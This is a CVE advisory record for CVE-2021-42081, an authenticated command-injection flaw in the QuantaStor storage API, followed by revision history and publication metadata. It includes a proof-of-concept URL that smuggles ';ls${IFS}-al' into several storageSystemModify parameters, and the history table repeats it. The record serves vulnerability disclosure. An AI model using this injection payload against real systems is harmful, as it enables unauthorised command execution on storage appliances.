An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Metrics
Affected Vendors & Products
References
History
Mon, 22 Sep 2025 06:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. | An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al |
Fri, 22 Nov 2024 12:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References |
|
Tue, 12 Nov 2024 15:15:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Metrics |
ssvc
|
Wed, 16 Oct 2024 12:30:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References |
|
Wed, 16 Oct 2024 12:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References |
|

Status: PUBLISHED
Assigner: DIVD
Published:
Updated: 2025-09-22T06:40:06.104Z
Reserved: 2021-10-07T17:12:57.678Z
Link: CVE-2021-42081

Updated: 2024-08-04T03:22:25.989Z

Status : Modified
Published: 2023-07-10T16:15:47.583
Modified: 2025-09-22T07:15:39.650
Link: CVE-2021-42081

No data.